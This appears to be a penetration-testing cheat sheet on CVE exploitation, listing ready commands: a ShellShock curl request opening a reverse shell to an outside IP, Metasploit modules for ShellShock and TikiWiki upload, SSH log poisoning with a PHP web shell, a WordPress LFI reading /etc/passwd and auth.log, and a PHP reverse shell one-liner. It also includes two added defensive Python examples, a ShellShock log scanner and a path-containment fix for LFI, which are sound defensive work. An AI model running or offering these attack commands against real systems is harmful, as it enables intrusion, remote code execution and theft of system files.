CVE exploitation
Last updated
https://www.hackingarticles.in/shell-uploading-web-server-phpmyadmin/
# Directory Brute Forcing
gobuster dir -u http://172.25.210.128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
# ShellShock Vulnerability Detection
nmap -n -p80 --script http-shellshock --script-args uri=/cgi-bin/keygen,cmd=ls 172.25.30.5
# Reverse Shell via ShellShock Exploit
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
# Metasploit module to detect ShellShock
multi/http/apache_mod_cgi_bash_env_exec
# Python code to detect ShellShock: https://github.com/erinzm/shellshocker
shellshocker.py [OPTIONS] URL
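On the defensive side, the same "() { :; };" function-definition prefix that the nmap script and the curl request above send is what a web server log shows when a host has been probed. The following added example (not code from the page or from the shellshocker project) scans constructed Apache combined-format access log lines and flags any Referer or User-Agent value that carries the prefix, extracting the trailing command for triage; the log lines, IPs and paths are made up for the example.

```python
import re

# Bash function-definition prefix that characterises a ShellShock probe
# ("() {" at the start of an environment-variable value). Whitespace is
# optional, so "() {:;};" is caught as well as "() { :; };".
SHELLSHOCK_PREFIX_RE = re.compile(r"\(\)\s*\{")

# Captures the command appended after the function body ("}; <cmd>") so an
# analyst can see at a glance what the probe tried to run.
SHELLSHOCK_CMD_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)")

# Apache/nginx "combined" format: ip ident user [ts] "request" status bytes "referer" "user-agent"
COMBINED_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines for this example (not real traffic). Lines 3
# and 4 carry a ShellShock prefix in the User-Agent and Referer fields.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.88.1"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -c id"
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "() {:;}; echo probe" "Wget/1.21"
"""


def is_shellshock_value(value: str) -> bool:
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_PREFIX_RE.search(value) is not None


def extract_command(value: str) -> str:
    """Return the command trailing the function body, or '' if there is none."""
    m = SHELLSHOCK_CMD_RE.search(value)
    return m.group("cmd").strip() if m else ""


def scan_access_log(text: str) -> list:
    """Flag combined-format log lines whose Referer or User-Agent looks like a probe."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = COMBINED_LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real parser would record the anomaly
        for field in ("referer", "ua"):
            value = m.group(field)
            if is_shellshock_value(value):
                hits.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "status": m.group("status"),
                    "field": field,
                    "command": extract_command(value),
                })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```

A 200 status on a /cgi-bin/ path together with a flagged header is the combination worth escalating; a 404 still shows the host was scanned. The check only covers Referer and User-Agent because those are the fields the combined format records; any header that mod_cgi exports as an environment variable is a possible carrier, so inspection at a reverse proxy or WAF sees more than the access log does.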
To exploit the TikiWiki file upload vulnerability, use the following Metasploit module to perform an unrestricted file upload:
# If you find this unrestricted file upload, you can use the msfconsole command to exploit it.
# The default login for TikiWiki is usually admin:admin
use unix/webapp/tikiwiki_upload_exec
# Inject a malicious PHP payload through an SSH login attempt so that it is stored in the auth log file
ssh '<?php system($_GET["c"]); ?>'@<IP>
# Exploit a Local File Inclusion (LFI) vulnerability in WordPress (CVE-2018-7422)
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
# Combine LFI and log poisoning to get a shell: include the poisoned auth log through the same LFI and pass the command in the c parameter
ajax_path=/var/log/auth.log&c=ifconfig
# PHP code to establish a reverse shell to a remote host
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Explanation:
The ssh '<?php system($_GET["c"]); ?>'@<IP> command illustrates injecting a PHP payload to execute commands on the target system via SSH log poisoning.
The LFI example shows how to access the /etc/passwd file using a vulnerable WordPress plugin, indicating a directory traversal attack.
Combining LFI and log poisoning involves altering application logs to include malicious PHP code, leading to code execution when the log file is included via LFI.
The PHP reverse shell command uses socket programming to connect back to an attacker's machine, offering a shell interface for remote command execution.
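The root cause of the LFI chain above is an include whose path comes straight from a request parameter. The following added example (not code from the page, from WordPress or from the site-editor plugin) puts that weak pattern beside a hardened resolver: the unsafe version shows why an absolute path or a run of ".." segments selects /etc/passwd or the auth log, while the safe version rejects absolute paths and NUL bytes, confines the resolved path to a base directory and applies an extension allowlist. The base directory and allowlist are constructed for the example.

```python
import os

# Constructed base directory and extension allowlist for this example.
EXAMPLE_BASE = "/srv/app/templates"
ALLOWED_EXTENSIONS = {".php", ".tpl", ".html"}


def vulnerable_resolve(base_dir: str, requested: str) -> str:
    """The weak pattern behind the LFI: the request value reaches include() unchecked.

    os.path.join discards base_dir when `requested` is absolute, and '..'
    segments are never checked, so any readable file on the host can be selected.
    """
    return os.path.normpath(os.path.join(base_dir, requested))


class UnsafePath(ValueError):
    """Raised when a requested include path fails validation."""


def safe_resolve(base_dir: str, requested: str) -> str:
    """Resolve `requested` under base_dir, refusing anything that could escape it."""
    if not requested or "\x00" in requested:
        raise UnsafePath("empty or NUL-containing path")
    if os.path.isabs(requested) or requested.startswith("\\"):
        raise UnsafePath("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and follows symlinks, so the containment check
    # below sees the file that would actually be opened.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath shrinks to an ancestor directory if candidate escaped base.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("path escapes base directory")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UnsafePath("extension not in allowlist")
    return candidate


def classify(base_dir: str, requested: str) -> str:
    """Return 'allowed' or 'rejected: <reason>' for a requested include path."""
    try:
        safe_resolve(base_dir, requested)
        return "allowed"
    except UnsafePath as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed request values modelled on the LFI chain described above.
    for req in ("pattern.php", "/etc/passwd", "../../../var/log/auth.log",
                "pattern.php\x00.txt", "notes.log"):
        print(repr(req), "->", vulnerable_resolve(EXAMPLE_BASE, req),
              "|", classify(EXAMPLE_BASE, req))
```

The containment check is what stops log poisoning from paying off: even if an attacker controls the contents of the auth log, the include can no longer be pointed at it. The extension allowlist is a second, independent layer, so a file that somehow lands inside the base directory with a .log or .txt name is still refused.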